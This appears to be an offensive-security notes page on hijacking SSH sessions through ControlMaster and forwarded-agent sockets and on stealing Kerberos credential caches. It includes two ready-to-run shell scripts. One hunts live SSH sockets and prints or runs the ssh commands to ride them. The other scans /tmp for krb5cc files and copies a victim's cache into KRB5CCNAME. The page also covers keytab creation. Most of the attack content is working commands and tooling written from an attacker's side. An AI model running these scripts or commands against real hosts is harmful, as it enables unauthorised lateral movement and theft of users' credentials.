SSH Hijacking with ControlMaster

ControlMaster lets several SSH sessions share one network connection: the first session becomes the master and later ones are multiplexed over its Unix control socket without a new authentication. It is enabled on the client side by a "~/.ssh/config" such as:

Host *
    ControlPath ~/.ssh/cm/%r@%h:%p
    ControlMaster auto
    ControlPersist 5m

With this config the control socket is stored as <user>@<host>:<port> in ~/.ssh/cm (the %r, %h and %p tokens). ControlPersist declares how long the master connection stays open in the background after the last session using it is closed; during that window anyone who can open the socket gets a session on the target without credentials. When a victim SSHs into a target, the socket file is created and we can use it to piggyback into the target as well (the socket is created mode 0600 and owned by the victim, so this needs root or the victim's own account):

ssh -S ~/.ssh/cm/<socketfile> user@target

This technique only gets us into the specific servers we have socket files for, and only while the master connection is still alive ("ssh -O check -S <socketfile> user@target" asks the master without opening a session).

SSH Hijacking with SSH Agent Forwarding

In this scenario a user connects to a target server via an intermediate (jump) server with agent forwarding enabled, so the intermediate server's sshd creates a Unix socket that relays signing requests back to the user's local ssh-agent. The attacker is on the intermediate server. This requires ForwardAgent yes (or ssh -A) in the user's SSH config and AllowAgentForwarding yes (the default) in the intermediate server's sshd_config. The compromised user needs to have an active connection to the intermediate server at the time of exploitation, because the socket disappears when the session ends; and since the /tmp/ssh-XXXXXXXXXX directory holding it is mode 0700 and owned by that user, the attacker needs root or the user's own privileges to reach it.

ps aux | grep ssh                                      # sshd session processes of the victim; their pid names the socket
ls -lah /tmp                                           # ssh-XXXXXXXXXX/ directories (mode 0700, owned by the victim)
SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh-add -l     # list the identities the forwarded agent offers
SSH_AUTH_SOCK=/tmp/ssh-<..>/agent.<pid> ssh user@target

This technique lets us SSH into any server the keys loaded in the user's agent have access to, without ever seeing a private key: the agent only signs challenges, the key itself never leaves the user's machine.
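To turn the two hunts above into something repeatable, here is an added example script (mine, not from the original notes or from OpenSSH): it enumerates ControlMaster sockets and forwarded agent sockets, parses their names, reports the owner and whether the session behind each one is still alive, and prints the exact ssh / ssh-add invocation for it. The directory layouts, the DRY variable and the "run" argument are conventions assumed for this example.

```shell
#!/bin/sh
# Added example (not part of the original notes): hunt for hijackable SSH
# sockets on a host, covering both cases above: ControlMaster control sockets
# named %r@%h:%p (user@host:port) and forwarded agent sockets named
# /tmp/ssh-XXXXXXXXXX/agent.<pid>. Directory layouts, user names and pids in
# the comments are assumptions for illustration, not values from the page.

# Split a ControlMaster socket name user@host:port into its parts. The port is
# taken after the LAST colon so that IPv6 hosts such as fe80::1 parse correctly.
# Prints "user host port"; returns 1 if the name does not have that shape.
cm_parse() {
    name=${1##*/}                                   # drop the directory part
    case $name in *@*:*) ;; *) return 1 ;; esac
    user=${name%%@*}
    rest=${name#*@}
    port=${rest##*:}
    host=${rest%:*}
    case $port in ''|*[!0-9]*) return 1 ;; esac    # port must be numeric
    printf '%s %s %s\n' "$user" "$host" "$port"
}

# Extract the pid from an agent socket path .../ssh-XXXXXXXXXX/agent.<pid>.
# The pid is that of the sshd process serving the victim's session.
agent_pid() {
    p=${1##*/}
    case $p in agent.*) ;; *) return 1 ;; esac
    pid=${p#agent.}
    case $pid in ''|*[!0-9]*) return 1 ;; esac
    printf '%s\n' "$pid"
}

# Owner of a path, via ls so it works without GNU stat.
owner_of() { ls -ld "$1" | awk '{print $3}'; }

# Walk a ControlMaster socket directory (default ~/.ssh/cm) and print, for each
# socket, its owner and the command that rides the existing master connection.
# Real sockets are of type s; the scan accepts any entry so it can be exercised
# on a constructed directory. With DRY=0 it also asks the master whether it is
# still alive (ssh -O check), which opens no session on the target.
cm_scan() {
    dir=${1:-$HOME/.ssh/cm}
    [ -d "$dir" ] || return 1
    found=0
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        parsed=$(cm_parse "$f") || continue
        set -- $parsed                              # $1=user $2=host $3=port
        found=$((found + 1))
        printf 'CM socket %s owner=%s -> ssh -S %s -O check %s@%s -p %s\n' \
            "$f" "$(owner_of "$f")" "$f" "$1" "$2" "$3"
        if [ "${DRY:-1}" = 0 ] && command -v ssh >/dev/null; then
            ssh -S "$f" -O check "$1@$2" -p "$3"
        fi
    done
    [ "$found" -gt 0 ]
}

# Walk BASE (default /tmp) for forwarded agent sockets. The ssh-* directory is
# mode 0700, so listing it already needs root or the victim's uid. Prints owner,
# pid and whether that pid (the victim's sshd session) still exists; a stale
# socket is useless. With DRY=0 it lists the identities the agent offers.
agent_scan() {
    base=${1:-/tmp}
    found=0
    for s in "$base"/ssh-*/agent.*; do
        [ -e "$s" ] || continue
        pid=$(agent_pid "$s") || continue
        found=$((found + 1))
        # /proc check first: kill -0 fails with EPERM on other users' processes
        if [ -d "/proc/$pid" ] || kill -0 "$pid" 2>/dev/null; then alive=alive; else alive=stale; fi
        printf 'agent socket %s owner=%s pid=%s (%s) -> SSH_AUTH_SOCK=%s ssh-add -l\n' \
            "$s" "$(owner_of "$s")" "$pid" "$alive" "$s"
        if [ "${DRY:-1}" = 0 ] && command -v ssh-add >/dev/null; then
            SSH_AUTH_SOCK=$s ssh-add -l
        fi
    done
    [ "$found" -gt 0 ]
}

# Run both scans when invoked as "sh ssh-hunt.sh run" (DRY=0 to go live).
if [ "${1:-}" = run ]; then
    cm_scan
    agent_scan
fi
```

Run it as root or as the victim's user; by default it only prints what it finds and the command to use it, so nothing touches the victim's sessions until DRY=0 is set.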


Setup on Linux Attacker Box

To use Kerberos from a Linux attacker box, add the target box and the KDC (the domain controller) to /etc/hosts, then install the MIT Kerberos client tools:

sudo apt install krb5-user


Then configure /etc/krb5.conf (the krb5-user installer asks for a default realm; the rest is added by hand). The realm is the AD domain name in upper case, kdc and admin_server take the domain controller's hostname or IP (left blank on this page; use the name from /etc/hosts), and [domain_realm] maps the lower-case DNS domain, plus every host under it via the leading-dot entry, onto the realm. dns_canonicalize_hostname = false stops the library from rewriting the hostnames we hand it before building service principal names:

[libdefaults]
        default_realm = EXAMPLE.COM
        dns_canonicalize_hostname = false

[realms]
        EXAMPLE.COM = {
                kdc =
                admin_server =
        }

[domain_realm]
        .example.com = EXAMPLE.COM
        example.com = EXAMPLE.COM


Check whether a credential cache is already selected through the environment (when KRB5CCNAME is unset the default cache, normally /tmp/krb5cc_<uid>, is used; klist shows its contents):

env | grep KRB5CCNAME

Most impacket example scripts accept "-k" to authenticate with Kerberos using the ticket from the cache in KRB5CCNAME (together with "-no-pass" so they do not prompt for a password). With Kerberos the target has to be given as the hostname the service ticket is issued for, not an IP address, which is why the /etc/hosts entries above matter.


Ldapsearch using Kerberos authentication. It needs a TGT in the cache already (from kinit, or from a hijacked cache as below) and the GSSAPI SASL module (package libsasl2-modules-gssapi-mit on Debian/Ubuntu). -D and -W belong to simple binds and are dropped: with -Y GSSAPI the identity comes from the ticket. The host in -H must be the FQDN the ldap/ service principal is registered for, and -N keeps ldapsearch from reverse-resolving it first:

ldapsearch -Y GSSAPI -N -H ldap://<target> -b "dc=<domain>,dc=<tld>" "(servicePrincipalName=*)" servicePrincipalName


Check /tmp for krb5cc_* files: these are credential caches (TGT plus any service tickets) of logged-in users, named after the owner's uid (krb5cc_<uid>, or krb5cc_<uid>_<random> when created by SSSD or pam). Only the owner and root can read them; if we can, make a copy, change its ownership to our user and point KRB5CCNAME at it (a bare path means a FILE: cache), then klist shows the principal and its tickets:

export KRB5CCNAME=/tmp/krb5cc_<uid>
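As an added example that is not part of the original page (nor of MIT Kerberos), the following script writes the krb5.conf described above for a given realm and KDC, hunts a directory for credential caches, and takes one over by copying it and pointing KRB5CCNAME at the copy. The realm and KDC are parameters; the krb5cc_<uid>[_<random>] naming, the passwd file lookup and the user names in the comments are assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): set up the attacker box for
# Kerberos and hunt credential caches. Realm and KDC are parameters; the
# /tmp/krb5cc_<uid> and /tmp/krb5cc_<uid>_<random> naming is the MIT/SSSD
# default; user names in comments are illustrative.

# Print a minimal krb5.conf for REALM using KDC for both kdc and admin_server.
# The realm is upper case; the [domain_realm] keys are the lower-case DNS
# domain, once with a leading dot so every host beneath it maps to the realm.
# rdns = false keeps libkrb5 from reverse-resolving hosts we only know from
# /etc/hosts, which would otherwise change the service principal it asks for.
gen_krb5_conf() {
    realm=$1; kdc=$2
    dom=$(printf '%s' "$realm" | tr '[:upper:]' '[:lower:]')
    cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_canonicalize_hostname = false
    rdns = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
    }

[domain_realm]
    .$dom = $realm
    $dom = $realm
EOF
}

# Numeric uid encoded in a ccache file name (krb5cc_<uid> or krb5cc_<uid>_<rand>).
ccache_uid() {
    n=${1##*/}
    case $n in krb5cc_*) ;; *) return 1 ;; esac
    u=${n#krb5cc_}
    u=${u%%_*}
    case $u in ''|*[!0-9]*) return 1 ;; esac
    printf '%s\n' "$u"
}

# Resolve a uid to a user name from a passwd file (default /etc/passwd); "?" if unknown.
uid_to_name() {
    awk -F: -v uid="$1" '$3 == uid { print $1; found = 1; exit }
                         END { if (!found) print "?" }' "${2:-/etc/passwd}"
}

# List ccache files under DIR (default /tmp): path, uid, user and whether we can
# read it. Unreadable caches need root (or that uid) before use_ccache can copy them.
ccache_scan() {
    dir=${1:-/tmp}; passwd=${2:-/etc/passwd}
    found=0
    for c in "$dir"/krb5cc_*; do
        [ -e "$c" ] || continue
        uid=$(ccache_uid "$c") || continue
        found=$((found + 1))
        if [ -r "$c" ]; then r=readable; else r=unreadable; fi
        printf '%s uid=%s user=%s %s\n' "$c" "$uid" "$(uid_to_name "$uid" "$passwd")" "$r"
    done
    [ "$found" -gt 0 ]
}

# Take over a ccache: copy it to a file we own, lock the copy down, export
# KRB5CCNAME so every Kerberos-aware tool uses it, and print the new value.
# Call it directly (not in a subshell) so the export survives.
use_ccache() {
    src=$1; dst=${2:-/tmp/krb5cc_hijacked.$$}
    cp "$src" "$dst" || return 1
    chmod 600 "$dst"
    KRB5CCNAME=FILE:$dst
    export KRB5CCNAME
    if command -v klist >/dev/null; then klist >&2 || true; fi   # show principal and tickets
    printf '%s\n' "$KRB5CCNAME"
}
```

Typical flow: gen_krb5_conf EXAMPLE.COM dc01.example.com > /etc/krb5.conf as root on the attacker box, then on a compromised host ccache_scan and use_ccache /tmp/krb5cc_<uid> as root; afterwards kinit is not needed, klist and any "-k" tool run with the stolen TGT.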


A keytab stores Kerberos principal names together with their long-term keys, so scripts and services can obtain tickets without an interactive password. Given a known password, one can be created with ktutil (interactive, shipped with krb5-user); -k sets the key version number (kvno) recorded in the entry and -e the encryption type. rc4-hmac is the easy choice because its key is derived from the password alone; AES keys (aes256-cts-hmac-sha1-96, which AD prefers and the only option where RC4 is disabled) are salted with realm and principal name, so for those add -f to have recent ktutil versions fetch the salt from the KDC:

ktutil
addent -password -p <user>@<domain> -k 1 -e rc4-hmac
<enter password>
wkt /tmp/<user>.keytab
quit

Use via (kinit -R renews the TGT; it only works while the ticket is still valid and was issued renewable):

kinit -k -t /tmp/<user>.keytab <user>@<domain>
kinit -R
